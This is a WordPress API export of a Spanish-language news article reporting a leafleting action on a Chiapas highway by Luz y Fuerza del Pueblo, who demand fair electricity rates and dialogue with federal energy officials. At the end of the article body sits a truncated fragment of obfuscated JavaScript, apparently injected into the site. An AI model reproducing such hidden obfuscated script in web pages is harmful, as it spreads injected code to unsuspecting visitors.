{"id":9479,"date":"2023-04-11T02:57:51","date_gmt":"2023-04-11T02:57:51","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=9479"},"modified":"2023-04-11T02:57:52","modified_gmt":"2023-04-11T02:57:52","slug":"con-volanteo-piden-miembros-de-luz-y-fuerza-del-pueblo-tarifas-justas","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=9479","title":{"rendered":"Con volanteo piden miembros de Luz y Fuerza del Pueblo, tarifas justas"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"523\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/04\/WhatsApp-Image-2023-04-10-at-9.08.17-AM-1024x523.jpeg\" alt=\"\" class=\"wp-image-9480\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/04\/WhatsApp-Image-2023-04-10-at-9.08.17-AM-1024x523.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/04\/WhatsApp-Image-2023-04-10-at-9.08.17-AM-300x153.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/04\/WhatsApp-Image-2023-04-10-at-9.08.17-AM-768x392.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/04\/WhatsApp-Image-2023-04-10-at-9.08.17-AM.jpeg 1171w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/Corresponsal<\/p>\n\n\n\n<p>10 de abril del 2023. San Crist\u00f3bal de Las Casas.- M\u00e1s de 100 personas integrantes de la Organizaci\u00f3n Luz y Fuerza del Pueblo iniciaron un volanteo alrededor de las 9 de la ma\u00f1ana sobre el tramo carretero San Crist\u00f3bal a Chiapa de Corzo, a la altura del kilometro 46, en conmemoraci\u00f3n a los 104 a\u00f1os del asesinato del General Emiliano Zapata, donde pidieron tarifas justas.<\/p>\n\n\n\n<p>El Grupo encabezado por Alonso G\u00f3mez S\u00e1ntiz, dirigente en la regi\u00f3n altos de esta organizaci\u00f3n, adherentes a la Sexta declaraci\u00f3n de la Selva Lacandona del Ej\u00e9rcito Zapatista, demandaron la instalaci\u00f3n de una mesa de di\u00e1logo con la Secretaria de energ\u00eda, con la finalidad de que se atiendan sus demandas, entre ellas &#8220;tarifas justas&#8221;.<\/p>\n\n\n\n<p>Como miembros de la Red Nacional de Resistencia Civil en M\u00e9xico, que dijeron mantuvieron una Movilizaci\u00f3n en los Estados de Oaxaca, Veracruz, Chiapas, Puebla, Tlaxcala, Morelos, Ciudad de M\u00e9xico, Estado de M\u00e9xico, entre otros, exigiendo di\u00e1logo abierto con la Secretaria de Energ\u00eda, el Secretario de Gobernaci\u00f3n, Ad\u00e1n Augusto L\u00f3pez; el Director de Comisi\u00f3n Federal de electricidad, Manuel Bartlhet D\u00edaz, con la finalidad de resolver sus demandas, como tarifas Justas de Energ\u00eda El\u00e9ctrica<\/p>\n\n\n\n<p>Pidieron adem\u00e1s la renacionalizaci\u00f3n de la industria y energ\u00eda el\u00e9ctrica, y su reconocimiento como derecho humano en la constituci\u00f3n pol\u00edtica de M\u00e9xico \u201calto a la represi\u00f3n contra nuestros compa\u00f1eros de UCIZONI en Oaxaca y dem\u00e1s organizaciones que luchan por defender el territorio y los recursos naturales de los grandes proyectos trasnacionales\u201d.<\/p>\n\n\n\n<p>Exigieron el cumplimiento de &#8220;Los Acuerdos de San Andr\u00e9s&#8221; firmados entre el EZLN y el Gobierno Federal en 1996, en materia de Derechos y Cultura Ind\u00edgena con los titulares de la Secretar\u00eda de Energ\u00eda, CFE y gobernaci\u00f3n, \u201cen los di\u00e1logos que hemos llevado a cabo, se han negado a levantar minutas de acuerdo, firmar un acuerdo de respeto entre instituciones y resistencia civil, y \u00faltimamente se han negado a dar continuidad al dialogo\u201d.<\/p>\n\n\n\n<p>\u201cCon esta movilizaci\u00f3n estamos exigiendo una mesa de di\u00e1logo, constructiva, seria y propositiva, que busque solucionar nuestras demandas\u201d, concluyen.<\/p>\n\n\n\n<p>Es de mencionar que desde las primeras horas de este lunes, elementos del Grupo Interinstitucional mantuvieron presencia preventiva en el Km. 46 de la s\u00faper carretera San Crist\u00f3bal-Chiapa de Corzo, a fin de garantizar el libre tr\u00e1nsito, debido a la presencia de grupo de personas de la organizaci\u00f3n de la fuerza civil &#8220;Luz y Fuerza del Pueblo&#8221;, quienes \u00fanicamente realizan labores informativas, entregando volantes, en el marco del 104 aniversario luctuoso del General Emiliano Zapata Salazar.<\/p>\n\n\n\n<p>El Grupo Interinstitucional informa a la ciudadan\u00eda sancristobalense y a visitantes a esta ciudad que la v\u00eda de comunicaci\u00f3n permanece libre a la circulaci\u00f3n, sin bloqueo alguno, dejando libre totalmente el tramo alrededor de las 13:30 horas.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/Corresponsal 10 de abril del 2023. San Crist\u00f3bal de Las Casas.- M\u00e1s de 100 personas integrantes de la Organizaci\u00f3n Luz y Fuerza del Pueblo iniciaron un volanteo alrededor de las 9 de la ma\u00f1ana sobre el tramo carretero San Crist\u00f3bal a Chiapa de Corzo, a la altura del kilometro 46, en conmemoraci\u00f3n a los &hellip;<\/p>\n","protected":false},"author":2,"featured_media":9480,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-9479","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9479","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=9479"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9479\/revisions"}],"predecessor-version":[{"id":9481,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9479\/revisions\/9481"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/9480"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=9479"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=9479"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=9479"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}